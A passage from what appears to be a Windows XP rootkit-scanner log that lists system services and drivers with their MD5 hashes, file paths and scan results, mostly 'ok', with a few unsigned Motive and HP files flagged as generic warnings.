20:32:34.0296 3536 [ 32192B4EBE8720ED8D49A455C962CB91 ] JavaQuickStarterService C:\Program Files\Java\jre6\bin\jqs.exe
20:32:34.0328 3536 JavaQuickStarterService - ok
20:32:34.0343 3536 [ 463C1EC80CD17420A542B7F36A36F128 ] Kbdclass C:\WINDOWS\system32\DRIVERS\kbdclass.sys
20:32:34.0500 3536 Kbdclass - ok
20:32:34.0546 3536 [ 692BCF44383D056AED41B045A323D378 ] kmixer C:\WINDOWS\system32\drivers\kmixer.sys
20:32:34.0671 3536 kmixer - ok
20:32:34.0718 3536 [ B467646C54CC746128904E1654C750C1 ] KSecDD C:\WINDOWS\system32\drivers\KSecDD.sys
20:32:34.0796 3536 KSecDD - ok
20:32:34.0828 3536 [ 4103DBB6CAA85E40D271C1AD12BBF776 ] L8042pr2 C:\WINDOWS\system32\DRIVERS\L8042pr2.Sys
20:32:34.0906 3536 L8042pr2 - ok
20:32:34.0984 3536 [ 3A7C3CBE5D96B8AE96CE81F0B22FB527 ] lanmanserver C:\WINDOWS\System32\srvsvc.dll
20:32:35.0046 3536 lanmanserver - ok
20:32:35.0078 3536 [ A8888A5327621856C0CEC4E385F69309 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
20:32:35.0156 3536 lanmanworkstation - ok
20:32:35.0171 3536 lbrtfdc - ok
20:32:35.0203 3536 [ A7DB739AE99A796D91580147E919CC59 ] LmHosts C:\WINDOWS\System32\lmhsvc.dll
20:32:35.0359 3536 LmHosts - ok
20:32:35.0406 3536 [ B666F835C18974F392A387C6E863072F ] LMouFlt2 C:\WINDOWS\system32\DRIVERS\LMouFlt2.Sys
20:32:35.0421 3536 LMouFlt2 - ok
20:32:35.0531 3536 [ E6CB119EF2E148EAA1A247343550756E ] McciCMService C:\Program Files\Common Files\Motive\McciCMService.exe
20:32:35.0546 3536 McciCMService ( UnsignedFile.Multi.Generic ) - warning
20:32:35.0546 3536 McciCMService - detected UnsignedFile.Multi.Generic (1)
20:32:35.0578 3536 [ 986B1FF5814366D71E0AC5755C88F2D3 ] Messenger C:\WINDOWS\System32\msgsvc.dll
20:32:35.0765 3536 Messenger - ok
20:32:35.0796 3536 [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd C:\WINDOWS\system32\drivers\mnmdd.sys
20:32:35.0953 3536 mnmdd - ok
20:32:35.0968 3536 [ D18F1F0C101D06A1C1ADF26EED16FCDD ] mnmsrvc C:\WINDOWS\System32\mnmsrvc.exe
20:32:36.0125 3536 mnmsrvc - ok
20:32:36.0171 3536 [ DFCBAD3CEC1C5F964962AE10E0BCC8E1 ] Modem C:\WINDOWS\system32\drivers\Modem.sys
20:32:36.0328 3536 Modem - ok
20:32:36.0328 3536 [ 35C9E97194C8CFB8430125F8DBC34D04 ] Mouclass C:\WINDOWS\system32\DRIVERS\mouclass.sys
20:32:36.0484 3536 Mouclass - ok
20:32:36.0531 3536 [ B1C303E17FB9D46E87A98E4BA6769685 ] mouhid C:\WINDOWS\system32\DRIVERS\mouhid.sys
20:32:36.0671 3536 mouhid - ok
20:32:36.0687 3536 [ A80B9A0BAD1B73637DBCBBA7DF72D3FD ] MountMgr C:\WINDOWS\system32\drivers\MountMgr.sys
20:32:36.0859 3536 MountMgr - ok
20:32:36.0921 3536 [ 730A519505621DF46BCBF9CDAC9FB6AD ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
20:32:36.0937 3536 MozillaMaintenance - ok
20:32:36.0953 3536 MpKsl08115bda - ok
20:32:36.0968 3536 mraid35x - ok
20:32:36.0984 3536 [ 9BD4DCB5412921864A7AACDEDFBD1923 ] MREMP50 C:\PROGRA~1\COMMON~1\Motive\MREMP50.SYS
20:32:37.0015 3536 MREMP50 ( UnsignedFile.Multi.Generic ) - warning
20:32:37.0015 3536 MREMP50 - detected UnsignedFile.Multi.Generic (1)
20:32:37.0046 3536 [ 2BC9E43F55DE8C30FC817ED56D0EE907 ] MREMPR5 C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS
20:32:37.0062 3536 MREMPR5 ( UnsignedFile.Multi.Generic ) - warning
20:32:37.0062 3536 MREMPR5 - detected UnsignedFile.Multi.Generic (1)
20:32:37.0093 3536 [ 594B9D8194E3F4ECBF0325BD10BBEB05 ] MRENDIS5 C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS
20:32:37.0109 3536 MRENDIS5 ( UnsignedFile.Multi.Generic ) - warning
20:32:37.0109 3536 MRENDIS5 - detected UnsignedFile.Multi.Generic (1)
20:32:37.0140 3536 [ 07C02C892E8E1A72D6BF35004F0E9C5E ] MRESP50 C:\PROGRA~1\COMMON~1\Motive\MRESP50.SYS
20:32:37.0140 3536 MRESP50 ( UnsignedFile.Multi.Generic ) - warning
20:32:37.0140 3536 MRESP50 - detected UnsignedFile.Multi.Generic (1)
20:32:37.0140 3536 mrtRate - ok
20:32:37.0203 3536 [ 11D42BB6206F33FBB3BA0288D3EF81BD ] MRxDAV C:\WINDOWS\system32\DRIVERS\mrxdav.sys
20:32:37.0343 3536 MRxDAV - ok
20:32:37.0406 3536 [ 7D304A5EB4344EBEEAB53A2FE3FFB9F0 ] MRxSmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
20:32:37.0453 3536 MRxSmb - ok
20:32:37.0484 3536 [ A137F1470499A205ABBB9AAFB3B6F2B1 ] MSDTC C:\WINDOWS\System32\msdtc.exe
20:32:37.0656 3536 MSDTC - ok
20:32:37.0671 3536 [ C941EA2454BA8350021D774DAF0F1027 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
20:32:37.0828 3536 Msfs - ok
20:32:37.0843 3536 MSIServer - ok
20:32:37.0859 3536 [ D1575E71568F4D9E14CA56B7B0453BF1 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
20:32:38.0000 3536 MSKSSRV - ok
20:32:38.0015 3536 [ 325BB26842FC7CCC1FCCE2C457317F3E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
20:32:38.0156 3536 MSPCLOCK - ok
20:32:38.0171 3536 [ BAD59648BA099DA4A17680B39730CB3D ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
20:32:38.0328 3536 MSPQM - ok
20:32:38.0343 3536 [ AF5F4F3F14A8EA2C26DE30F7A1E17136 ] mssmbios C:\WINDOWS\system32\DRIVERS\mssmbios.sys
20:32:38.0500 3536 mssmbios - ok
20:32:38.0546 3536 [ DE6A75F5C270E756C5508D94B6CF68F5 ] Mup C:\WINDOWS\system32\drivers\Mup.sys
20:32:38.0578 3536 Mup - ok
20:32:38.0625 3536 [ 0102140028FAD045756796E1C685D695 ] napagent C:\WINDOWS\System32\qagentrt.dll
20:32:38.0796 3536 napagent - ok
20:32:38.0843 3536 [ 1DF7F42665C94B825322FAE71721130D ] NDIS C:\WINDOWS\system32\drivers\NDIS.sys
20:32:39.0000 3536 NDIS - ok
20:32:39.0031 3536 [ 0109C4F3850DFBAB279542515386AE22 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
20:32:39.0109 3536 NdisTapi - ok
20:32:39.0140 3536 [ F927A4434C5028758A842943EF1A3849 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
20:32:39.0296 3536 Ndisuio - ok
20:32:39.0328 3536 [ EDC1531A49C80614B2CFDA43CA8659AB ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
20:32:39.0484 3536 NdisWan - ok
20:32:39.0515 3536 [ 9282BD12DFB069D3889EB3FCC1000A9B ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
20:32:39.0578 3536 NDProxy - ok
20:32:39.0625 3536 [ 2969D26EEE289BE7422AA46FC55F4E38 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
20:32:39.0625 3536 Net Driver HPZ12 ( UnsignedFile.Multi.Generic ) - warning
20:32:39.0625 3536 Net Driver HPZ12 - detected UnsignedFile.Multi.Generic (1)
20:32:39.0671 3536 [ 5D81CF9A2F1A3A756B66CF684911CDF0 ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
20:32:39.0828 3536 NetBIOS - ok
20:32:39.0859 3536 [ 74B2B2F5BEA5E9A3DC021D685551BD3D ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
20:32:40.0015 3536 NetBT - ok
20:32:40.0046 3536 [ B857BA82860D7FF85AE29B095645563B ] NetDDE C:\WINDOWS\system32\netdde.exe
20:32:40.0234 3536 NetDDE - ok
20:32:40.0234 3536 [ B857BA82860D7FF85AE29B095645563B ] NetDDEdsdm C:\WINDOWS\system32\netdde.exe
20:32:40.0406 3536 NetDDEdsdm - ok
20:32:40.0437 3536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] Netlogon C:\WINDOWS\system32\lsass.exe
20:32:40.0593 3536 Netlogon - ok
20:32:40.0640 3536 [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE ] Netman C:\WINDOWS\System32\netman.dll
20:32:40.0781 3536 Netman - ok
20:32:40.0828 3536 [ D34612C5D02D026535B3095D620626AE ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
20:32:40.0843 3536 NetTcpPortSharing - ok
20:32:40.0875 3536 [ E9E47CFB2D461FA0FC75B7A74C6383EA ] NIC1394 C:\WINDOWS\system32\DRIVERS\nic1394.sys
20:32:41.0031 3536 NIC1394 - ok
20:32:41.0078 3536 [ 943337D786A56729263071623BBB9DE5 ] Nla C:\WINDOWS\System32\mswsock.dll
20:32:41.0125 3536 Nla - ok
20:32:41.0171 3536 [ 3182D64AE053D6FB034F44B6DEF8034A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
20:32:41.0328 3536 Npfs - ok
20:32:41.0343 3536 [ 78A08DD6A8D65E697C18E1DB01C5CDCA ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
20:32:41.0500 3536 Ntfs - ok
20:32:41.0515 3536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] NtLmSsp C:\WINDOWS\System32\lsass.exe
20:32:41.0687 3536 NtLmSsp - ok
20:32:41.0734 3536 [ 156F64A3345BD23C600655FB4D10BC08 ] NtmsSvc C:\WINDOWS\system32\ntmssvc.dll
20:32:41.0890 3536 NtmsSvc - ok
20:32:41.0937 3536 [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null C:\WINDOWS\system32\drivers\Null.sys
20:32:42.0078 3536 Null - ok
20:32:42.0109 3536 [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
20:32:42.0281 3536 NwlnkFlt - ok
20:32:42.0281 3536 [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
20:32:42.0453 3536 NwlnkFwd - ok
20:32:42.0500 3536 [ CA33832DF41AFB202EE7AEB05145922F ] ohci1394 C:\WINDOWS\system32\DRIVERS\ohci1394.sys
20:32:42.0656 3536 ohci1394 - ok
20:32:42.0750 3536 [ 7A56CF3E3F12E8AF599963B16F50FB6A ] ose C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
20:32:42.0765 3536 ose - ok
20:32:42.0796 3536 [ 5575FAF8F97CE5E713D108C2A58D7C7C ] Parport C:\WINDOWS\system32\DRIVERS\parport.sys
20:32:42.0953 3536 Parport - ok
20:32:42.0968 3536 [ BEB3BA25197665D82EC7065B724171C6 ] PartMgr C:\WINDOWS\system32\drivers\PartMgr.sys
20:32:43.0125 3536 PartMgr - ok
20:32:43.0156 3536 [ 70E98B3FD8E963A6A46A2E6247E0BEA1 ] ParVdm C:\WINDOWS\system32\drivers\ParVdm.sys
20:32:43.0312 3536 ParVdm - ok
20:32:43.0359 3536 [ A219903CCF74233761D92BEF471A07B1 ] PCI C:\WINDOWS\system32\DRIVERS\pci.sys
20:32:43.0515 3536 PCI - ok
20:32:43.0515 3536 PCIDump - ok
20:32:43.0531 3536 [ CCF5F451BB1A5A2A522A76E670000FF0 ] PCIIde C:\WINDOWS\system32\DRIVERS\pciide.sys
20:32:43.0687 3536 PCIIde - ok
20:32:43.0718 3536 [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1 ] Pcmcia C:\WINDOWS\system32\drivers\Pcmcia.sys
20:32:43.0875 3536 Pcmcia - ok
20:32:43.0875 3536 PDCOMP - ok
20:32:43.0890 3536 PDFRAME - ok
20:32:43.0906 3536 PDRELI - ok
20:32:43.0906 3536 PDRFRAME - ok
20:32:43.0921 3536 perc2 - ok
20:32:43.0937 3536 perc2hib - ok
20:32:43.0984 3536 [ 444F122E68DB44C0589227781F3C8B3F ] Pfc C:\WINDOWS\system32\drivers\pfc.sys
20:32:43.0984 3536 Pfc ( UnsignedFile.Multi.Generic ) - warning
20:32:43.0984 3536 Pfc - detected UnsignedFile.Multi.Generic (1)
20:32:44.0015 3536 [ 65DF52F5B8B6E9BBD183505225C37315 ] PlugPlay C:\WINDOWS\system32\services.exe
20:32:44.0046 3536 PlugPlay - ok
20:32:44.0046 3536 [ BAFC9706BDF425A02B66468AB2605C59 ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
20:32:44.0078 3536 Pml Driver HPZ12 ( UnsignedFile.Multi.Generic ) - warning
20:32:44.0078 3536 Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic (1)
20:32:44.0078 3536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] PolicyAgent C:\WINDOWS\system32\lsass.exe
20:32:44.0250 3536 PolicyAgent - ok
20:32:44.0281 3536 [ EFEEC01B1D3CF84F16DDD24D9D9D8F99 ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
20:32:44.0453 3536 PptpMiniport - ok
20:32:44.0484 3536 [ A32BEBAF723557681BFC6BD93E98BD26 ] Processor C:\WINDOWS\system32\DRIVERS\processr.sys
20:32:44.0640 3536 Processor - ok
20:32:44.0656 3536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
20:32:44.0828 3536 ProtectedStorage - ok
20:32:44.0859 3536 [ 390C204CED3785609AB24E9C52054A84 ] Ps2 C:\WINDOWS\system32\DRIVERS\PS2.sys
20:32:44.0906 3536 Ps2 - ok
20:32:44.0953 3536 [ 09298EC810B07E5D582CB3A3F9255424 ] PSched C:\WINDOWS\system32\DRIVERS\psched.sys
20:32:45.0109 3536 PSched - ok
20:32:45.0125 3536 [ 80D317BD1C3DBC5D4FE7B1678C60CADD ] Ptilink C:\WINDOWS\system32\DRIVERS\ptilink.sys
20:32:45.0296 3536 Ptilink - ok
20:32:45.0328 3536 [ E42E3433DBB4CFFE8FDD91EAB29AEA8E ] PxHelp20 C:\WINDOWS\system32\DRIVERS\PxHelp20.sys
20:32:45.0359 3536 PxHelp20 - ok
20:32:45.0359 3536 ql1080 - ok
20:32:45.0375 3536 Ql10wnt - ok
20:32:45.0375 3536 ql12160 - ok
20:32:45.0390 3536 ql1240 - ok
20:32:45.0406 3536 ql1280 - ok
20:32:45.0437 3536 [ FE0D99D6F31E4FAD8159F690D68DED9C ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
20:32:45.0578 3536 RasAcd - ok
20:32:45.0625 3536 [ AD188BE7BDF94E8DF4CA0A55C00A5073 ] RasAuto C:\WINDOWS\System32\rasauto.dll
20:32:45.0781 3536 RasAuto - ok
20:32:45.0812 3536 [ 11B4A627BC9614B885C4969BFA5FF8A6 ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
20:32:45.0953 3536 Rasl2tp - ok
20:32:46.0000 3536 [ 76A9A3CBEADD68CC57CDA5E1D7448235 ] RasMan C:\WINDOWS\System32\rasmans.dll
20:32:46.0156 3536 RasMan - ok
20:32:46.0156 3536 [ 5BC962F2654137C9909C3D4603587DEE ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
20:32:46.0312 3536 RasPppoe - ok
20:32:46.0328 3536 [ FDBB1D60066FCFBB7452FD8F9829B242 ] Raspti C:\WINDOWS\system32\DRIVERS\raspti.sys
20:32:46.0484 3536 Raspti - ok
20:32:46.0500 3536 [ 7AD224AD1A1437FE28D89CF22B17780A ] Rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
20:32:46.0640 3536 Rdbss - ok
20:32:46.0687 3536 [ 4912D5B403614CE99C28420F75353332 ] RDPCDD C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
20:32:46.0828 3536 RDPCDD - ok
20:32:46.0890 3536 [ 43AF5212BD8FB5BA6EED9754358BD8F7 ] RDPWD C:\WINDOWS\system32\drivers\RDPWD.sys
20:32:46.0953 3536 RDPWD - ok
20:32:46.0968 3536 [ 3C37BF86641BDA977C3BF8A840F3B7FA ] RDSessMgr C:\WINDOWS\system32\sessmgr.exe
20:32:47.0156 3536 RDSessMgr - ok
20:32:47.0203 3536 [ F828DD7E1419B6653894A8F97A0094C5 ] redbook C:\WINDOWS\system32\DRIVERS\redbook.sys
20:32:47.0343 3536 redbook - ok
20:32:47.0375 3536 [ 7E699FF5F59B5D9DE5390E3C34C67CF5 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
20:32:47.0515 3536 RemoteAccess - ok
20:32:47.0546 3536 [ AAED593F84AFA419BBAE8572AF87CF6A ] RpcLocator C:\WINDOWS\System32\locator.exe
20:32:47.0687 3536 RpcLocator - ok
20:32:47.0734 3536 [ 6B27A5C03DFB94B4245739065431322C ] RpcSs C:\WINDOWS\System32\rpcss.dll
20:32:47.0765 3536 RpcSs - ok
20:32:47.0796 3536 [ 471B3F9741D762ABE75E9DEEA4787E47 ] RSVP C:\WINDOWS\System32\rsvp.exe
20:32:47.0937 3536 RSVP - ok
20:32:47.0984 3536 [ 2EF9C0DC26B30B2318B1FC3FAA1F0AE7 ] rtl8139 C:\WINDOWS\system32\DRIVERS\R8139n51.SYS
20:32:48.0125 3536 rtl8139 - ok
20:32:48.0156 3536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] SamSs C:\WINDOWS\system32\lsass.exe
20:32:48.0312 3536 SamSs - ok
20:32:48.0390 3536 [ 39763504067962108505BFF25F024345 ] SASDIFSV C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
20:32:48.0406 3536 SASDIFSV - ok
20:32:48.0453 3536 [ 77B9FC20084B48408AD3E87570EB4A85 ] SASKUTIL C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
20:32:48.0468 3536 SASKUTIL - ok
20:32:48.0500 3536 [ 86D007E7A654B9A71D1D7D856B104353 ] SCardSvr C:\WINDOWS\System32\SCardSvr.exe
20:32:48.0687 3536 SCardSvr - ok
20:32:48.0734 3536 [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA ] Schedule C:\WINDOWS\system32\schedsvc.dll
20:32:48.0890 3536 Schedule - ok
20:32:48.0937 3536 [ 90A3935D05B494A5A39D37E71F09A677 ] Secdrv C:\WINDOWS\system32\DRIVERS\secdrv.sys
20:32:49.0000 3536 Secdrv - ok
20:32:49.0031 3536 [ CBE612E2BB6A10E3563336191EDA1250 ] seclogon C:\WINDOWS\System32\seclogon.dll
20:32:49.0187 3536 seclogon - ok
20:32:49.0187 3536 [ 7FDD5D0684ECA8C1F68B4D99D124DCD0 ] SENS C:\WINDOWS\system32\sens.dll
20:32:49.0390 3536 SENS - ok
20:32:49.0421 3536 [ CCA207A8896D4C6A0C9CE29A4AE411A7 ] Serial C:\WINDOWS\system32\drivers\Serial.sys
20:32:49.0578 3536 Serial - ok
20:32:49.0609 3536 [ 8E6B8C671615D126FDC553D1E2DE5562 ] Sfloppy C:\WINDOWS\system32\drivers\Sfloppy.sys
20:32:49.0765 3536 Sfloppy - ok
20:32:49.0812 3536 [ 83F41D0D89645D7235C051AB1D9523AC ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
20:32:49.0984 3536 SharedAccess - ok
20:32:50.0015 3536 [ 99BC0B50F511924348BE19C7C7313BBF ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
20:32:50.0046 3536 ShellHWDetection - ok
20:32:50.0046 3536 Simbad - ok
20:32:50.0093 3536 [ 94F6EEA8A688A37F71BF9C9AEAA42666 ] SiS315 C:\WINDOWS\system32\DRIVERS\sisgrp.sys
20:32:50.0187 3536 SiS315 - ok
20:32:50.0203 3536 [ 61CA562DEF09A782D26B3E7EDEC5369A ] SISAGP C:\WINDOWS\system32\DRIVERS\SISAGPX.sys
20:32:50.0250 3536 SISAGP - ok
20:32:50.0281 3536 [ 837D26F79A1647066D75C5C811887475 ] SiSkp C:\WINDOWS\system32\DRIVERS\srvkp.sys
20:32:50.0312 3536 SiSkp - ok
20:32:50.0328 3536 Sparrow - ok
20:32:50.0359 3536 [ AB8B92451ECB048A4D1DE7C3FFCB4A9F ] splitter C:\WINDOWS\system32\drivers\splitter.sys
20:32:50.0515 3536 splitter - ok
20:32:50.0562 3536 [ 60784F891563FB1B767F70117FC2428F ] Spooler C:\WINDOWS\system32\spoolsv.exe
20:32:50.0609 3536 Spooler - ok
20:32:50.0656 3536 [ 76BB022C2FB6902FD5BDD4F78FC13A5D ] sr C:\WINDOWS\system32\DRIVERS\sr.sys
20:32:50.0734 3536 sr - ok
20:32:50.0781 3536 [ 3805DF0AC4296A34BA4BF93B346CC378 ] srservice C:\WINDOWS\system32\srsvc.dll
20:32:50.0875 3536 srservice - ok
20:32:50.0937 3536 [ 47DDFC2F003F7F9F0592C6874962A2E7 ] Srv C:\WINDOWS\system32\DRIVERS\srv.sys
20:32:50.0984 3536 Srv - ok
20:32:51.0015 3536 [ 0A5679B3714EDAB99E357057EE88FCA6 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
20:32:51.0093 3536 SSDPSRV - ok
20:32:51.0140 3536 [ A9573045BAA16EAB9B1085205B82F1ED ] StillCam C:\WINDOWS\system32\DRIVERS\serscan.sys
20:32:51.0265 3536 StillCam - ok
20:32:51.0296 3536 [ 8BAD69CBAC032D4BBACFCE0306174C30 ] stisvc C:\WINDOWS\system32\wiaservc.dll
20:32:51.0484 3536 stisvc - ok
20:32:51.0531 3536 [ 3941D127AEF12E93ADDF6FE6EE027E0F ] swenum C:\WINDOWS\system32\DRIVERS\swenum.sys
20:32:51.0671 3536 swenum - ok
20:32:51.0687 3536 [ 8CE882BCC6CF8A62F2B2323D95CB3D01 ] swmidi C:\WINDOWS\system32\drivers\swmidi.sys
20:32:51.0859 3536 swmidi - ok
20:32:51.0875 3536 SwPrv - ok
20:32:51.0890 3536 symc810 - ok
20:32:51.0906 3536 symc8xx - ok
20:32:51.0921 3536 sym_hi - ok
20:32:51.0921 3536 sym_u3 - ok
20:32:51.0953 3536 [ 8B83F3ED0F1688B4958F77CD6D2BF290 ] sysaudio C:\WINDOWS\system32\drivers\sysaudio.sys
20:32:52.0109 3536 sysaudio - ok
20:32:52.0140 3536 [ C7ABBC59B43274B1109DF6B24D617051 ] SysmonLog C:\WINDOWS\system32\smlogsvc.exe
20:32:52.0312 3536 SysmonLog - ok
20:32:52.0359 3536 [ 3CB78C17BB664637787C9A1C98F79C38 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
20:32:52.0515 3536 TapiSrv - ok
20:32:52.0562 3536 [ 9AEFA14BD6B182D61E3119FA5F436D3D ] Tcpip C:\WINDOWS\system32\DRIVERS\tcpip.sys
20:32:52.0593 3536 Tcpip - ok
20:32:52.0640 3536 [ 6471A66807F5E104E4885F5B67349397 ] TDPIPE C:\WINDOWS\system32\drivers\TDPIPE.sys
20:32:52.0796 3536 TDPIPE - ok
20:32:52.0828 3536 [ C56B6D0402371CF3700EB322EF3AAF61 ] TDTCP C:\WINDOWS\system32\drivers\TDTCP.sys
20:32:52.0968 3536 TDTCP - ok
20:32:53.0000 3536 [ 88155247177638048422893737429D9E ] TermDD C:\WINDOWS\system32\DRIVERS\termdd.sys
20:32:53.0234 3536 TermDD - ok
20:32:53.0296 3536 [ FF3477C03BE7201C294C35F684B3479F ] TermService C:\WINDOWS\System32\termsrv.dll
20:32:53.0453 3536 TermService - ok
20:32:53.0468 3536 [ 99BC0B50F511924348BE19C7C7313BBF ] Themes C:\WINDOWS\System32\shsvcs.dll
20:32:53.0500 3536 Themes - ok
20:32:53.0515 3536 TosIde - ok
20:32:53.0562 3536 [ 55BCA12F7F523D35CA3CB833C725F54E ] TrkWks C:\WINDOWS\system32\trkwks.dll
20:32:53.0734 3536 TrkWks - ok
20:32:53.0750 3536 [ 5787B80C2E3C5E2F56C2A233D91FA2C9 ] Udfs C:\WINDOWS\system32\drivers\Udfs.sys
20:32:53.0937 3536 Udfs - ok
20:32:53.0937 3536 ultra - ok
20:32:54.0000 3536 [ 402DDC88356B1BAC0EE3DD1580C76A31 ] Update C:\WINDOWS\system32\DRIVERS\update.sys
20:32:54.0156 3536 Update - ok
20:32:54.0203 3536 [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91 ] upnphost C:\WINDOWS\System32\upnphost.dll
20:32:54.0281 3536 upnphost - ok
20:32:54.0312 3536 [ 05365FB38FCA1E98F7A566AAAF5D1815 ] UPS C:\WINDOWS\System32\ups.exe
20:32:54.0468 3536 UPS - ok
20:32:54.0515 3536 [ E919708DB44ED8543A7C017953148330 ] usbaudio C:\WINDOWS\system32\drivers\usbaudio.sys
20:32:54.0671 3536 usbaudio - ok
20:32:54.0718 3536 [ 173F317CE0DB8E21322E71B7E60A27E8 ] usbccgp C:\WINDOWS\system32\DRIVERS\usbccgp.sys
20:32:54.0875 3536 usbccgp - ok
20:32:54.0921 3536 [ 65DCF09D0E37D4C6B11B5B0B76D470A7 ] usbehci C:\WINDOWS\system32\DRIVERS\usbehci.sys
20:32:55.0062 3536 usbehci - ok
20:32:55.0078 3536 [ 1AB3CDDE553B6E064D2E754EFE20285C ] usbhub C:\WINDOWS\system32\DRIVERS\usbhub.sys
20:32:55.0265 3536 usbhub - ok
20:32:55.0312 3536 [ 0DAECCE65366EA32B162F85F07C6753B ] usbohci C:\WINDOWS\system32\DRIVERS\usbohci.sys
20:32:55.0484 3536 usbohci - ok
20:32:55.0515 3536 [ A717C8721046828520C9EDF31288FC00 ] usbprint C:\WINDOWS\system32\DRIVERS\usbprint.sys
20:32:55.0718 3536 usbprint - ok
20:32:55.0750 3536 [ A0B8CF9DEB1184FBDD20784A58FA75D4 ] usbscan C:\WINDOWS\system32\DRIVERS\usbscan.sys
20:32:55.0921 3536 usbscan - ok
20:32:55.0968 3536 [ A32426D9B14A089EAA1D922E0C5801A9 ] USBSTOR C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
20:32:56.0140 3536 USBSTOR - ok
20:32:56.0187 3536 [ 26496F9DEE2D787FC3E61AD54821FFE6 ] usbuhci C:\WINDOWS\system32\DRIVERS\usbuhci.sys
20:32:56.0343 3536 usbuhci - ok
20:32:56.0375 3536 [ 0D3A8FAFCEACD8B7625CD549757A7DF1 ] VgaSave C:\WINDOWS\System32\drivers\vga.sys
20:32:56.0546 3536 VgaSave - ok
20:32:56.0609 3536 [ 4B039BBD037B01F5DB5A144C837F283A ] viaagp1 C:\WINDOWS\system32\DRIVERS\viaagp1.sys
20:32:56.0656 3536 viaagp1 - ok
20:32:56.0687 3536 [ 0CC705DB634A3BC355887E3D478DD386 ] viagfx C:\WINDOWS\system32\DRIVERS\vtmini.sys
20:32:56.0750 3536 viagfx - ok
20:32:56.0750 3536 [ 3B3EFCDA263B8AC14FDF9CBDD0791B2E ] ViaIde C:\WINDOWS\system32\DRIVERS\viaide.sys
20:32:56.0921 3536 ViaIde - ok
20:32:57.0000 3536 [ 4C8FCB5CC53AAB716D810740FE59D025 ] VolSnap C:\WINDOWS\system32\drivers\VolSnap.sys
20:32:57.0187 3536 VolSnap - ok
20:32:57.0453 3536 [ 7A9DB3A67C333BF0BD42E42B8596854B ] VSS C:\WINDOWS\System32\vssvc.exe
20:32:57.0968 3536 VSS - ok
20:32:58.0062 3536 [ 54AF4B1D5459500EF0937F6D33B1914F ] W32Time C:\WINDOWS\system32\w32time.dll
20:32:58.0234 3536 W32Time - ok
20:32:58.0265 3536 [ E20B95BAEDB550F32DD489265C1DA1F6 ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
20:32:58.0437 3536 Wanarp - ok
20:32:58.0437 3536 WDICA - ok
20:32:58.0468 3536 [ 6768ACF64B18196494413695F0C3A00F ] wdmaud C:\WINDOWS\system32\drivers\wdmaud.sys
20:32:58.0656 3536 wdmaud - ok
20:32:58.0734 3536 [ 77A354E28153AD2D5E120A5A8687BC06 ] WebClient C:\WINDOWS\System32\webclnt.dll
20:32:58.0906 3536 WebClient - ok
20:32:59.0046 3536 [ F45DD1E1365D857DD08BC23563370D0E ] WinDefend C:\Program Files\Windows Defender\MsMpEng.exe
20:32:59.0062 3536 WinDefend - ok
20:32:59.0218 3536 [ 2D0E4ED081963804CCC196A0929275B5 ] winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
20:32:59.0375 3536 winmgmt - ok
20:32:59.0437 3536 [ C51B4A5C05A5475708E3C81C7765B71D ] WmdmPmSN C:\WINDOWS\system32\MsPMSNSv.dll
20:32:59.0484 3536 WmdmPmSN - ok
20:32:59.0515 3536 [ E0673F1106E62A68D2257E376079F821 ] WmiApSrv C:\WINDOWS\System32\wbem\wmiapsrv.exe
20:32:59.0687 3536 WmiApSrv - ok
20:32:59.0781 3536 [ F74E3D9A7FA9556C3BBB14D4E5E63D3B ] WMPNetworkSvc C:\Program Files\Windows Media Player\WMPNetwk.exe
